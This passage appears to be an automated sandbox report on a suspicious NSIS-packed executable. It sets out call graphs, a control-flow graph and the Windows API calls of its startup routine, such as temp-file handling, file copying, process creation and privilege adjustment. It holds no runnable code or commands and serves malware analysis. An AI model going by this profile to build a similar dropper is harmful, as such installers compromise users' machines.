5511 402d3e 17 API calls 5510->5511 5512 401948 5511->5512 5513 405b00 67 API calls 5512->5513 5514 401951 5513->5514 5515 40190f 5516 402d3e 17 API calls 5515->5516 5517 401916 5516->5517 5518 405a54 MessageBoxIndirectW 5517->5518 5519 40191f 5518->5519 5520 401491 5521 405456 24 API calls 5520->5521 5522 401498 5521->5522 5523 401f12 5524 402d3e 17 API calls 5523->5524 5525 401f18 5524->5525 5526 402d3e 17 API calls 5525->5526 5527 401f21 5526->5527 5528 402d3e 17 API calls 5527->5528 5529 401f2a 5528->5529 5530 402d3e 17 API calls 5529->5530 5531 401f33 5530->5531 5532 401423 24 API calls 5531->5532 5533 401f3a 5532->5533 5540 405a1a ShellExecuteExW 5533->5540 5535 401f82 5536 402925 5535->5536 5541 40688e WaitForSingleObject 5535->5541 5538 401f9f CloseHandle 5538->5536 5540->5535 5542 4068a8 5541->5542 5543 4068ba GetExitCodeProcess 5542->5543 5544 40681f 2 API calls 5542->5544 5543->5538 5545 4068af WaitForSingleObject 5544->5545 5545->5542 5546 402614 5547 402d3e 17 API calls 5546->5547 5548 40261b 5547->5548 5551 405ee4 GetFileAttributesW CreateFileW 5548->5551 5550 402627 5551->5550 4930 405595 4931 4055b6 GetDlgItem GetDlgItem GetDlgItem 4930->4931 4932 40573f 4930->4932 4976 404379 SendMessageW 4931->4976 4934 405770 4932->4934 4935 405748 GetDlgItem CreateThread CloseHandle 4932->4935 4937 40579b 4934->4937 4938 4057c0 4934->4938 4939 405787 ShowWindow ShowWindow 4934->4939 4935->4934 4979 405529 5 API calls 4935->4979 4936 405626 4943 40562d GetClientRect GetSystemMetrics SendMessageW SendMessageW 4936->4943 4940 4057a7 4937->4940 4941 4057fb 4937->4941 4942 4043ab 8 API calls 4938->4942 4978 404379 SendMessageW 4939->4978 4945 4057d5 ShowWindow 4940->4945 4946 4057af 4940->4946 4941->4938 4951 405809 SendMessageW 4941->4951 4958 4057ce 4942->4958 4949 40569b 4943->4949 4950 40567f SendMessageW SendMessageW 4943->4950 4947 4057f5 4945->4947 4948 4057e7 4945->4948 4952 40431d SendMessageW 4946->4952 4954 40431d SendMessageW 4947->4954 4953 405456 24 API calls 4948->4953 4955 4056a0 SendMessageW 4949->4955 4956 4056ae 4949->4956 4950->4949 4957 405822 CreatePopupMenu 4951->4957 4951->4958 4952->4938 4953->4947 4954->4941 4955->4956 4960 404344 18 API calls 4956->4960 4959 40642b 17 API calls 4957->4959 4961 405832 AppendMenuW 4959->4961 4962 4056be 4960->4962 4963 405862 TrackPopupMenu 4961->4963 4964 40584f GetWindowRect 4961->4964 4965 4056c7 ShowWindow 4962->4965 4966 4056fb GetDlgItem SendMessageW 4962->4966 4963->4958 4968 40587d 4963->4968 4964->4963 4969 4056ea 4965->4969 4970 4056dd ShowWindow 4965->4970 4966->4958 4967 405722 SendMessageW SendMessageW 4966->4967 4967->4958 4971 405899 SendMessageW 4968->4971 4977 404379 SendMessageW 4969->4977 4970->4969 4971->4971 4972 4058b6 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 4971->4972 4974 4058db SendMessageW 4972->4974 4974->4974 4975 405904 GlobalUnlock SetClipboardData CloseClipboard 4974->4975 4975->4958 4976->4936 4977->4966 4978->4937 5552 73f52ca3 5553 73f52cbb 5552->5553 5554 73f5158f 2 API calls 5553->5554 5555 73f52cd6 5554->5555 5556 402596 5557 402d7e 17 API calls 5556->5557 5558 4025a0 5557->5558 5559 402d1c 17 API calls 5558->5559 5560 4025a9 5559->5560 5561 402925 5560->5561 5562 4025d1 RegEnumValueW 5560->5562 5563 4025c5 RegEnumKeyW 5560->5563 5564 4025e6 RegCloseKey 5562->5564 5563->5564 5564->5561 5566 401d17 5567 402d1c 17 API calls 5566->5567 5568 401d1d IsWindow 5567->5568 5569 401a20 5568->5569 4988 401b9b 4989 401bec 4988->4989 4993 401ba8 4988->4993 4990 401bf1 4989->4990 4991 401c16 GlobalAlloc 4989->4991 5001 402395 4990->5001 5009 4063ee lstrcpynW 4990->5009 4992 40642b 17 API calls 4991->4992 4996 401c31 4992->4996 4993->4996 4997 401bbf 4993->4997 4994 40642b 17 API calls 4998 40238f 4994->4998 4996->4994 4996->5001 5007 4063ee lstrcpynW 4997->5007 4998->5001 5002 405a54 MessageBoxIndirectW 4998->5002 4999 401c03 GlobalFree 4999->5001 5002->5001 5003 401bce 5008 4063ee lstrcpynW 5003->5008 5005 401bdd 5010 4063ee lstrcpynW 5005->5010 5007->5003 5008->5005 5009->4999 5010->5001 5570 402b9d SendMessageW 5571 402bc2 5570->5571 5572 402bb7 InvalidateRect 5570->5572 5572->5571 5573 40149e 5574 402395 5573->5574 5575 4014ac PostQuitMessage 5573->5575 5575->5574 4257 4034a2 SetErrorMode GetVersion 4258 4034e1 4257->4258 4259 4034e7 4257->4259 4260 4067e3 5 API calls 4258->4260 4261 406773 3 API calls 4259->4261 4260->4259 4262 4034fd lstrlenA 4261->4262 4262->4259 4263 40350d 4262->4263 4264 4067e3 5 API calls 4263->4264 4265 403514 4264->4265 4266 4067e3 5 API calls 4265->4266 4267 40351b 4266->4267 4268 4067e3 5 API calls 4267->4268 4269 403527 #17 OleInitialize SHGetFileInfoW 4268->4269 4347 4063ee lstrcpynW 4269->4347 4272 403573 GetCommandLineW 4348 4063ee lstrcpynW 4272->4348 4274 403585 4275 405cf0 CharNextW 4274->4275 4276 4035aa CharNextW 4275->4276 4277 4036d4 GetTempPathW 4276->4277 4284 4035c3 4276->4284 4349 403471 4277->4349 4279 4036ec 4280 4036f0 GetWindowsDirectoryW lstrcatW 4279->4280 4281 403746 DeleteFileW 4279->4281 4285 403471 12 API calls 4280->4285 4359 403015 GetTickCount GetModuleFileNameW 4281->4359 4282 405cf0 CharNextW 4282->4284 4284->4282 4289 4036bf 4284->4289 4291 4036bd 4284->4291 4287 40370c 4285->4287 4286 40375a 4292 4037fd 4286->4292 4296 405cf0 CharNextW 4286->4296 4343 40380d 4286->4343 4287->4281 4288 403710 GetTempPathW lstrcatW SetEnvironmentVariableW SetEnvironmentVariableW 4287->4288 4290 403471 12 API calls 4288->4290 4443 4063ee lstrcpynW 4289->4443 4294 40373e 4290->4294 4291->4277 4387 403abd 4292->4387 4294->4281 4294->4343 4313 403779 4296->4313 4299 403947 4301 4039cb ExitProcess 4299->4301 4302 40394f GetCurrentProcess OpenProcessToken 4299->4302 4300 403827 4453 405a54 4300->4453 4307 403967 LookupPrivilegeValueW AdjustTokenPrivileges 4302->4307 4308 40399b 4302->4308 4304 4037d7 4310 405dcb 18 API calls 4304->4310 4305 40383d 4311 4059bf 5 API calls 4305->4311 4307->4308 4312 4067e3 5 API calls 4308->4312 4314 4037e3 4310->4314 4315 403842 lstrcatW 4311->4315 4316 4039a2 4312->4316 4313->4304 4313->4305 4314->4343 4444 4063ee lstrcpynW 4314->4444 4317 403853 lstrcatW 4315->4317 4318 40385e lstrcatW lstrcmpiW 4315->4318 4319 4039b7 ExitWindowsEx 4316->4319 4322 4039c4 4316->4322 4317->4318 4321 40387a 4318->4321 4318->4343 4319->4301 4319->4322 4324 403886 4321->4324 4325 40387f 4321->4325 4462 40140b 4322->4462 4323 4037f2 4445 4063ee lstrcpynW 4323->4445 4329 4059a2 2 API calls 4324->4329 4328 405925 4 API calls 4325->4328 4330 403884 4328->4330 4331 40388b SetCurrentDirectoryW 4329->4331 4330->4331 4332 4038a6 4331->4332 4333 40389b 4331->4333 4458 4063ee lstrcpynW 4332->4458 4457 4063ee lstrcpynW 4333->4457 4336 4038b4 4337 40642b 17 API calls 4336->4337 4340 40393b 4336->4340 4342 4061b4 36 API calls 4336->4342 4344 40642b 17 API calls 4336->4344 4346 403926 CloseHandle 4336->4346 4459 4059d7 CreateProcessW 4336->4459 4338 4038e5 DeleteFileW 4337->4338 4338->4336 4339 4038f2 CopyFileW 4338->4339 4339->4336 4341 4061b4 36 API calls 4340->4341 4341->4343 4342->4336 4446 4039e3 4343->4446 4344->4336 4346->4336 4347->4272 4348->4274 4350 40669d 5 API calls 4349->4350 4351 40347d 4350->4351 4352 403487 4351->4352 4353 405cc3 3 API calls 4351->4353 4352->4279 4354 40348f 4353->4354 4355 4059a2 2 API calls 4354->4355 4356 403495 4355->4356 4465 405f13 4356->4465 4469 405ee4 GetFileAttributesW CreateFileW 4359->4469 4361 403055 4380 403065 4361->4380 4470 4063ee lstrcpynW 4361->4470 4363 40307b 4364 405d0f 2 API calls 4363->4364 4365 403081 4364->4365 4471 4063ee lstrcpynW 4365->4471 4367 40308c GetFileSize 4368 403186 4367->4368 4386 4030a3 4367->4386 4472 402fb1 4368->4472 4370 40318f 4372 4031bf GlobalAlloc 4370->4372 4370->4380 4507 40345a SetFilePointer 4370->4507 4483 40345a SetFilePointer 4372->4483 4373 4031f2 4377 402fb1 6 API calls 4373->4377 4376 4031da 4484 40324c 4376->4484 4377->4380 4378 4031a8 4381 403444 ReadFile 4378->4381 4380->4286 4383 4031b3 4381->4383 4382 402fb1 6 API calls 4382->4386 4383->4372 4383->4380 4384 4031e6 4384->4380 4384->4384 4385 403223 SetFilePointer 4384->4385 4385->4380 4386->4368 4386->4373 4386->4380 4386->4382 4504 403444 4386->4504 4388 4067e3 5 API calls 4387->4388 4389 403ad1 4388->4389 4390 403ad7 GetUserDefaultUILanguage 4389->4390 4391 403ae9 4389->4391 4513 406335 wsprintfW 4390->4513 4392 4062bc 3 API calls 4391->4392 4394 403b19 4392->4394 4396 403b38 lstrcatW 4394->4396 4397 4062bc 3 API calls 4394->4397 4395 403ae7 4514 403d93 4395->4514 4396->4395 4397->4396 4400 405dcb 18 API calls 4401 403b6a 4400->4401 4402 403bfe 4401->4402 4404 4062bc 3 API calls 4401->4404 4403 405dcb 18 API calls 4402->4403 4405 403c04 4403->4405 4406 403b9c 4404->4406 4407 403c14 LoadImageW 4405->4407 4408 40642b 17 API calls 4405->4408 4406->4402 4414 403bbd lstrlenW 4406->4414 4415 405cf0 CharNextW 4406->4415 4409 403cba 4407->4409 4410 403c3b RegisterClassW 4407->4410 4408->4407 4413 40140b 2 API calls 4409->4413 4411 403c71 SystemParametersInfoW CreateWindowExW 4410->4411 4412 403cc4 4410->4412 4411->4409 4412->4343 4418 403cc0 4413->4418 4416 403bf1 4414->4416 4417 403bcb lstrcmpiW 4414->4417 4419 403bba 4415->4419 4421 405cc3 3 API calls 4416->4421 4417->4416 4420 403bdb GetFileAttributesW 4417->4420 4418->4412 4423 403d93 18 API calls 4418->4423 4419->4414 4422 403be7 4420->4422 4424 403bf7 4421->4424 4422->4416 4425 405d0f 2 API calls 4422->4425 4426 403cd1 4423->4426 4529 4063ee lstrcpynW 4424->4529 4425->4416 4428 403d60 4426->4428 4429 403cdd ShowWindow 4426->4429 4522 405529 OleInitialize 4428->4522 4431 406773 3 API calls 4429->4431 4433 403cf5 4431->4433 4432 403d66 4434 403d82 4432->4434 4435 403d6a 4432->4435 4436 403d03 GetClassInfoW 4433->4436 4440 406773 3 API calls 4433->4440 4439 40140b 2 API calls 4434->4439 4435->4412 4442 40140b 2 API calls 4435->4442 4437 403d17 GetClassInfoW RegisterClassW 4436->4437 4438 403d2d DialogBoxParamW 4436->4438 4437->4438 4441 40140b 2 API calls 4438->4441 4439->4412 4440->4436 4441->4412 4442->4412 4443->4291 4444->4323 4445->4292 4447 4039fb 4446->4447 4448 4039ed CloseHandle 4446->4448 4541 403a28 4447->4541 4448->4447 4451 405b00 67 API calls 4452 403816 OleUninitialize 4451->4452 4452->4299 4452->4300 4454 405a69 4453->4454 4455 403835 ExitProcess 4454->4455 4456 405a7d MessageBoxIndirectW 4454->4456 4456->4455 4457->4332 4458->4336 4460 405a16 4459->4460 4461 405a0a CloseHandle 4459->4461 4460->4336 4461->4460 4463 401389 2 API calls 4462->4463 4464 401420 4463->4464 4464->4301 4466 405f20 GetTickCount GetTempFileNameW 4465->4466 4467 4034a0 4466->4467 4468 405f56 4466->4468 4467->4279 4468->4466 4468->4467 4469->4361 4470->4363 4471->4367 4473 402fd2 4472->4473 4474 402fba 4472->4474 4477 402fe2 GetTickCount 4473->4477 4478 402fda 4473->4478 4475 402fc3 DestroyWindow 4474->4475 4476 402fca 4474->4476 4475->4476 4476->4370 4479 402ff0 CreateDialogParamW ShowWindow 4477->4479 4480 403013 4477->4480 4508 40681f 4478->4508 4479->4480 4480->4370 4483->4376 4486 403265 4484->4486 4485 403293 4487 403444 ReadFile 4485->4487 4486->4485 4512 40345a SetFilePointer 4486->4512 4489 40329e 4487->4489 4490 4032b0 GetTickCount 4489->4490 4491 4033dd 4489->4491 4496 4033c7 4489->4496 4493 4032dc 4490->4493 4490->4496 4492 40341f 4491->4492 4497 4033e1 4491->4497 4494 403444 ReadFile 4492->4494 4495 403444 ReadFile 4493->4495 4493->4496 4500 403332 GetTickCount 4493->4500 4501 403357 MulDiv wsprintfW 4493->4501 4503 405f96 WriteFile 4493->4503 4494->4496 4495->4493 4496->4384 4497->4496 4498 403444 ReadFile 4497->4498 4499 405f96 WriteFile 4497->4499 4498->4497 4499->4497 4500->4493 4502 405456 24 API calls 4501->4502 4502->4493 4503->4493 4505 405f67 ReadFile 4504->4505 4506 403457 4505->4506 4506->4386 4507->4378 4509 40683c PeekMessageW 4508->4509 4510 406832 DispatchMessageW 4509->4510 4511 402fe0 4509->4511 4510->4509 4511->4370 4512->4485 4513->4395 4515 403da7 4514->4515 4530 406335 wsprintfW 4515->4530 4517 403e18 4531 403e4c 4517->4531 4519 403b48 4519->4400 4520 403e1d 4520->4519 4521 40642b 17 API calls 4520->4521 4521->4520 4534 404390 4522->4534 4524 405573 4525 404390 SendMessageW 4524->4525 4527 405585 OleUninitialize 4525->4527 4526 40554c 4526->4524 4537 401389 4526->4537 4527->4432 4529->4402 4530->4517 4532 40642b 17 API calls 4531->4532 4533 403e5a SetWindowTextW 4532->4533 4533->4520 4535 4043a8 4534->4535 4536 404399 SendMessageW 4534->4536 4535->4526 4536->4535 4539 401390 4537->4539 4538 4013fe 4538->4526 4539->4538 4540 4013cb MulDiv SendMessageW 4539->4540 4540->4539 4542 403a36 4541->4542 4543 403a3b FreeLibrary GlobalFree 4542->4543 4544 403a00 4542->4544 4543->4543 4543->4544 4544->4451 4545 402522 4556 402d7e 4545->4556 4548 402d3e 17 API calls 4549 402535 4548->4549 4550 402540 RegQueryValueExW 4549->4550 4555 402925 4549->4555 4551 402560 4550->4551 4552 402566 RegCloseKey 4550->4552 4551->4552 4561 406335 wsprintfW 4551->4561 4552->4555 4557 402d3e 17 API calls 4556->4557 4558 402d95 4557->4558 4559 40625b RegOpenKeyExW 4558->4559 4560 40252c 4559->4560 4560->4548 4561->4552 5576 4021a2 5577 402d3e 17 API calls 5576->5577 5578 4021a9 5577->5578 5579 402d3e 17 API calls 5578->5579 5580 4021b3 5579->5580 5581 402d3e 17 API calls 5580->5581 5582 4021bd 5581->5582 5583 402d3e 17 API calls 5582->5583 5584 4021c7 5583->5584 5585 402d3e 17 API calls 5584->5585 5587 4021d1 5585->5587 5586 402210 CoCreateInstance 5589 40222f 5586->5589 5587->5586 5588 402d3e 17 API calls 5587->5588 5588->5586 5590 401423 24 API calls 5589->5590 5591 4022ee 5589->5591 5590->5591 5592 4015a3 5593 402d3e 17 API calls 5592->5593 5594 4015aa SetFileAttributesW 5593->5594 5595 4015bc 5594->5595 5596 401fa4 5597 402d3e 17 API calls 5596->5597 5598 401faa 5597->5598 5599 405456 24 API calls 5598->5599 5600 401fb4 5599->5600 5601 4059d7 2 API calls 5600->5601 5602 401fba 5601->5602 5603 402925 5602->5603 5605 40688e 5 API calls 5602->5605 5607 401fdd CloseHandle 5602->5607 5606 401fcf 5605->5606 5606->5607 5609 406335 wsprintfW 5606->5609 5607->5603 5609->5607 5610 40202a 5611 402d3e 17 API calls 5610->5611 5612 402031 5611->5612 5613 4067e3 5 API calls 5612->5613 5614 402040 5613->5614 5615 40205c GlobalAlloc 5614->5615 5618 4020c4 5614->5618 5616 402070 5615->5616 5615->5618 5617 4067e3 5 API calls 5616->5617 5619 402077 5617->5619 5620 4067e3 5 API calls 5619->5620 5621 402081 5620->5621 5621->5618 5625 406335 wsprintfW 5621->5625 5623 4020b6 5626 406335 wsprintfW 5623->5626 5625->5623 5626->5618 5627 4023aa 5628 4023b2 5627->5628 5629 4023b8 5627->5629 5630 402d3e 17 API calls 5628->5630 5631 402d3e 17 API calls 5629->5631 5632 4023c6 5629->5632 5630->5629 5631->5632 5634 402d3e 17 API calls 5632->5634 5635 4023d4 5632->5635 5633 402d3e 17 API calls 5636 4023dd WritePrivateProfileStringW 5633->5636 5634->5635 5635->5633 5637 402f2b 5638 402f3d SetTimer 5637->5638 5640 402f56 5637->5640 5638->5640 5639 402fab 5640->5639 5641 402f70 MulDiv wsprintfW SetWindowTextW SetDlgItemTextW 5640->5641 5641->5639 4659 40242c 4660 402434 4659->4660 4661 40245f 4659->4661 4662 402d7e 17 API calls 4660->4662 4663 402d3e 17 API calls 4661->4663 4664 40243b 4662->4664 4665 402466 4663->4665 4666 402445 4664->4666 4669 402473 4664->4669 4671 402dfc 4665->4671 4668 402d3e 17 API calls 4666->4668 4670 40244c RegDeleteValueW RegCloseKey 4668->4670 4670->4669 4672 402e09 4671->4672 4673 402e10 4671->4673 4672->4669 4673->4672 4675 402e41 4673->4675 4676 40625b RegOpenKeyExW 4675->4676 4677 402e6f 4676->4677 4678 402f24 4677->4678 4679 402e79 4677->4679 4678->4672 4680 402e7f RegEnumValueW 4679->4680 4684 402ea2 4679->4684 4681 402f09 RegCloseKey 4680->4681 4680->4684 4681->4678 4682 402ede RegEnumKeyW 4683 402ee7 RegCloseKey 4682->4683 4682->4684 4685 4067e3 5 API calls 4683->4685 4684->4681 4684->4682 4684->4683 4686 402e41 6 API calls 4684->4686 4687 402ef7 4685->4687 4686->4684 4688 402f19 4687->4688 4689 402efb RegDeleteKeyW 4687->4689 4688->4678 4689->4678 5642 401a30 5643 402d3e 17 API calls 5642->5643 5644 401a39 ExpandEnvironmentStringsW 5643->5644 5645 401a4d 5644->5645 5647 401a60 5644->5647 5646 401a52 lstrcmpW 5645->5646 5645->5647 5646->5647 5648 404db1 GetDlgItem GetDlgItem 5649 404e05 7 API calls 5648->5649 5657 40502f 5648->5657 5650 404ea2 SendMessageW 5649->5650 5651 404eaf DeleteObject 5649->5651 5650->5651 5652 404eba 5651->5652 5654 404ef1 5652->5654 5656 40642b 17 API calls 5652->5656 5653 405117 5655 4051c0 5653->5655 5665 40516d SendMessageW 5653->5665 5691 405022 5653->5691 5658 404344 18 API calls 5654->5658 5661 4051d5 5655->5661 5662 4051c9 SendMessageW 5655->5662 5663 404ed3 SendMessageW SendMessageW 5656->5663 5657->5653 5660 4050a1 5657->5660 5668 404cff 5 API calls 5657->5668 5659 404f05 5658->5659 5664 404344 18 API calls 5659->5664 5660->5653 5666 405109 SendMessageW 5660->5666 5672 4051e7 ImageList_Destroy 5661->5672 5673 4051ee 5661->5673 5677 4051fe 5661->5677 5662->5661 5663->5652 5680 404f16 5664->5680 5670 405182 SendMessageW 5665->5670 5665->5691 5666->5653 5667 4043ab 8 API calls 5671 4053c3 5667->5671 5668->5660 5669 405377 5678 405389 ShowWindow GetDlgItem ShowWindow 5669->5678 5669->5691 5676 405195 5670->5676 5672->5673 5674 4051f7 GlobalFree 5673->5674 5673->5677 5674->5677 5675 404ff1 GetWindowLongW SetWindowLongW 5679 40500a 5675->5679 5685 4051a6 SendMessageW 5676->5685 5677->5669 5690 404d7f 4 API calls 5677->5690 5693 405239 5677->5693 5678->5691 5681 405027 5679->5681 5682 40500f ShowWindow 5679->5682 5680->5675 5684 404f69 SendMessageW 5680->5684 5686 404fec 5680->5686 5688 404fa7 SendMessageW 5680->5688 5689 404fbb SendMessageW 5680->5689 5701 404379 SendMessageW 5681->5701 5700 404379 SendMessageW 5682->5700 5684->5680 5685->5655 5686->5675 5686->5679 5688->5680 5689->5680 5690->5693 5691->5667 5692 405343 5694 40534d InvalidateRect 5692->5694 5696 405359 5692->5696 5695 405267 SendMessageW 5693->5695 5697 40527d 5693->5697 5694->5696 5695->5697 5696->5669 5702 404cba 5696->5702 5697->5692 5699 4052f1 SendMessageW SendMessageW 5697->5699 5699->5697 5700->5691 5701->5657 5705 404bf1 5702->5705 5704 404ccf 5704->5669 5706 404c0a 5705->5706 5707 40642b 17 API calls 5706->5707 5708 404c6e 5707->5708 5709 40642b 17 API calls 5708->5709 5710 404c79 5709->5710 5711 40642b 17 API calls 5710->5711 5712 404c8f lstrlenW wsprintfW SetDlgItemTextW 5711->5712 5712->5704 5718 4044b4 lstrlenW 5719 4044d3 5718->5719 5720 4044d5 WideCharToMultiByte 5718->5720 5719->5720 5721 404835 5722 404861 5721->5722 5723 404872 5721->5723 5782 405a38 GetDlgItemTextW 5722->5782 5725 40487e GetDlgItem 5723->5725 5730 4048dd 5723->5730 5727 404892 5725->5727 5726 40486c 5729 40669d 5 API calls 5726->5729 5732 4048a6 SetWindowTextW 5727->5732 5737 405d6e 4 API calls 5727->5737 5728 4049c1 5780 404b70 5728->5780 5784 405a38 GetDlgItemTextW 5728->5784 5729->5723 5730->5728 5733 40642b 17 API calls 5730->5733 5730->5780 5735 404344 18 API calls 5732->5735 5738 404951 SHBrowseForFolderW 5733->5738 5734 4049f1 5739 405dcb 18 API calls 5734->5739 5740 4048c2 5735->5740 5736 4043ab 8 API calls 5741 404b84 5736->5741 5742 40489c 5737->5742 5738->5728 5743 404969 CoTaskMemFree 5738->5743 5744 4049f7 5739->5744 5745 404344 18 API calls 5740->5745 5742->5732 5746 405cc3 3 API calls 5742->5746 5747 405cc3 3 API calls 5743->5747 5785 4063ee lstrcpynW 5744->5785 5748 4048d0 5745->5748 5746->5732 5749 404976 5747->5749 5783 404379 SendMessageW 5748->5783 5752 4049ad SetDlgItemTextW 5749->5752 5757 40642b 17 API calls 5749->5757 5752->5728 5753 4048d6 5755 4067e3 5 API calls 5753->5755 5754 404a0e 5756 4067e3 5 API calls 5754->5756 5755->5730 5764 404a15 5756->5764 5758 404995 lstrcmpiW 5757->5758 5758->5752 5761 4049a6 lstrcatW 5758->5761 5759 404a56 5786 4063ee lstrcpynW 5759->5786 5761->5752 5762 404a5d 5763 405d6e 4 API calls 5762->5763 5765 404a63 GetDiskFreeSpaceW 5763->5765 5764->5759 5767 405d0f 2 API calls 5764->5767 5769 404aae 5764->5769 5768 404a87 MulDiv 5765->5768 5765->5769 5767->5764 5768->5769 5770 404b1f 5769->5770 5771 404cba 20 API calls 5769->5771 5772 404b42 5770->5772 5774 40140b 2 API calls 5770->5774 5773 404b0c 5771->5773 5787 404366 KiUserCallbackDispatcher 5772->5787 5776 404b21 SetDlgItemTextW 5773->5776 5777 404b11 5773->5777 5774->5772 5776->5770 5779 404bf1 20 API calls 5777->5779 5778 404b5e 5778->5780 5781 40478e SendMessageW 5778->5781 5779->5770 5780->5736 5781->5780 5782->5726 5783->5753 5784->5734 5785->5754 5786->5762 5787->5778 5788 401735 5789 402d3e 17 API calls 5788->5789 5790 40173c SearchPathW 5789->5790 5791 401757 5790->5791 5792 73f51000 5793 73f5101b 5 API calls 5792->5793 5794 73f51019 5793->5794 5795 402636 5796 402665 5795->5796 5797 40264a 5795->5797 5798 402695 5796->5798 5799 40266a 5796->5799 5800 402d1c 17 API calls 5797->5800 5802 402d3e 17 API calls 5798->5802 5801 402d3e 17 API calls 5799->5801 5807 402651 5800->5807 5803 402671 5801->5803 5804 40269c lstrlenW 5802->5804 5812 406410 WideCharToMultiByte 5803->5812 5804->5807 5806 402685 lstrlenA 5806->5807 5808 4026c9 5807->5808 5809 4026df 5807->5809 5811 405fc5 5 API calls 5807->5811 5808->5809 5810 405f96 WriteFile 5808->5810 5810->5809 5811->5808 5812->5806 5813 4014b8 5814 4014be 5813->5814 5815 401389 2 API calls 5814->5815 5816 4014c6 5815->5816 5817 401d38 5818 402d1c 17 API calls 5817->5818 5819 401d3f 5818->5819 5820 402d1c 17 API calls 5819->5820 5821 401d4b GetDlgItem 5820->5821 5822 402630 5821->5822 5823 4028bb 5824 4028c1 5823->5824 5825 4028c9 FindClose 5824->5825 5826 402bc2 5824->5826 5825->5826

                                              Executed Functions

                                              Function 004034A2 Relevance: 87.9, APIs: 32, Strings: 18, Instructions: 410stringfilecomCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 0 4034a2-4034df SetErrorMode GetVersion 1 4034e1-4034e9 call 4067e3 0->1 2 4034f2 0->2 1->2 7 4034eb 1->7 4 4034f7-40350b call 406773 lstrlenA 2->4 9 40350d-403529 call 4067e3 * 3 4->9 7->2 16 40353a-403599 #17 OleInitialize SHGetFileInfoW call 4063ee GetCommandLineW call 4063ee 9->16 17 40352b-403531 9->17 24 4035a3-4035bd call 405cf0 CharNextW 16->24 25 40359b-4035a2 16->25 17->16 21 403533 17->21 21->16 28 4035c3-4035c9 24->28 29 4036d4-4036ee GetTempPathW call 403471 24->29 25->24 30 4035d2-4035d6 28->30 31 4035cb-4035d0 28->31 38 4036f0-40370e GetWindowsDirectoryW lstrcatW call 403471 29->38 39 403746-403760 DeleteFileW call 403015 29->39 33 4035d8-4035dc 30->33 34 4035dd-4035e1 30->34 31->30 31->31 33->34 36 4036a0-4036ad call 405cf0 34->36 37 4035e7-4035ed 34->37 54 4036b1-4036b7 36->54 55 4036af-4036b0 36->55 42 403608-403641 37->42 43 4035ef-4035f7 37->43 38->39 53 403710-403740 GetTempPathW lstrcatW SetEnvironmentVariableW * 2 call 403471 38->53 56 403811-403821 call 4039e3 OleUninitialize 39->56 57 403766-40376c 39->57 49 403643-403648 42->49 50 40365e-403698 42->50 47 4035f9-4035fc 43->47 48 4035fe 43->48 47->42 47->48 48->42 49->50 58 40364a-403652 49->58 50->36 52 40369a-40369e 50->52 52->36 59 4036bf-4036cd call 4063ee 52->59 53->39 53->56 54->28 61 4036bd 54->61 55->54 75 403947-40394d 56->75 76 403827-403837 call 405a54 ExitProcess 56->76 62 403801-403808 call 403abd 57->62 63 403772-40377d call 405cf0 57->63 65 403654-403657 58->65 66 403659 58->66 68 4036d2 59->68 61->68 74 40380d 62->74 79 4037cb-4037d5 63->79 80 40377f-4037b4 63->80 65->50 65->66 66->50 68->29 74->56 77 4039cb-4039d3 75->77 78 40394f-403965 GetCurrentProcess OpenProcessToken 75->78 88 4039d5 77->88 89 4039d9-4039dd ExitProcess 77->89 85 403967-403995 LookupPrivilegeValueW AdjustTokenPrivileges 78->85 86 40399b-4039a9 call 4067e3 78->86 82 4037d7-4037e5 call 405dcb 79->82 83 40383d-403851 call 4059bf lstrcatW 79->83 87 4037b6-4037ba 80->87 82->56 99 4037e7-4037fd call 4063ee * 2 82->99 100 403853-403859 lstrcatW 83->100 101 40385e-403878 lstrcatW lstrcmpiW 83->101 85->86 102 4039b7-4039c2 ExitWindowsEx 86->102 103 4039ab-4039b5 86->103 93 4037c3-4037c7 87->93 94 4037bc-4037c1 87->94 88->89 93->87 98 4037c9 93->98 94->93 94->98 98->79 99->62 100->101 101->56 105 40387a-40387d 101->105 102->77 106 4039c4-4039c6 call 40140b 102->106 103->102 103->106 108 403886 call 4059a2 105->108 109 40387f-403884 call 405925 105->109 106->77 117 40388b-403899 SetCurrentDirectoryW 108->117 109->117 118 4038a6-4038cf call 4063ee 117->118 119 40389b-4038a1 call 4063ee 117->119 123 4038d4-4038f0 call 40642b DeleteFileW 118->123 119->118 126 403931-403939 123->126 127 4038f2-403902 CopyFileW 123->127 126->123 129 40393b-403942 call 4061b4 126->129 127->126 128 403904-403924 call 4061b4 call 40642b call 4059d7 127->128 128->126 138 403926-40392d CloseHandle 128->138 129->56 138->126
                                              APIs
                                              • SetErrorMode.KERNELBASE ref: 004034C5
                                              • GetVersion.KERNEL32 ref: 004034CB
                                              • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 004034FE
                                              • #17.COMCTL32(?,00000007,00000009,0000000B), ref: 0040353B
                                              • OleInitialize.OLE32(00000000), ref: 00403542
                                              • SHGetFileInfoW.SHELL32(0079FF08,00000000,?,000002B4,00000000), ref: 0040355E
                                              • GetCommandLineW.KERNEL32(007A7A60,NSIS Error,?,00000007,00000009,0000000B), ref: 00403573
                                              • CharNextW.USER32(00000000,"C:\Users\user\Desktop\Ntwph4urc1.exe",00000020,"C:\Users\user\Desktop\Ntwph4urc1.exe",00000000,?,00000007,00000009,0000000B), ref: 004035AB
                                                • Part of subcall function 004067E3: GetModuleHandleA.KERNEL32(?,00000020,?,00403514,0000000B), ref: 004067F5
                                                • Part of subcall function 004067E3: GetProcAddress.KERNEL32(00000000,?), ref: 00406810
                                              • GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,?,00000007,00000009,0000000B), ref: 004036E5
                                              • GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB,?,00000007,00000009,0000000B), ref: 004036F6
                                              • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp,?,00000007,00000009,0000000B), ref: 00403702
                                              • GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp,?,00000007,00000009,0000000B), ref: 00403716
                                              • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low,?,00000007,00000009,0000000B), ref: 0040371E
                                              • SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low,?,00000007,00000009,0000000B), ref: 0040372F
                                              • SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\,?,00000007,00000009,0000000B), ref: 00403737
